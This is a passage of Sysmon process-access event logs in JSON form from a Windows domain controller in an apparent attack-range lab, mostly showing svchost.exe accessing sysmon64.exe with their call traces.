C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-001030590400}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2443,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2444,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2445,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2446,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2447,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2448,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2449,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2450,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 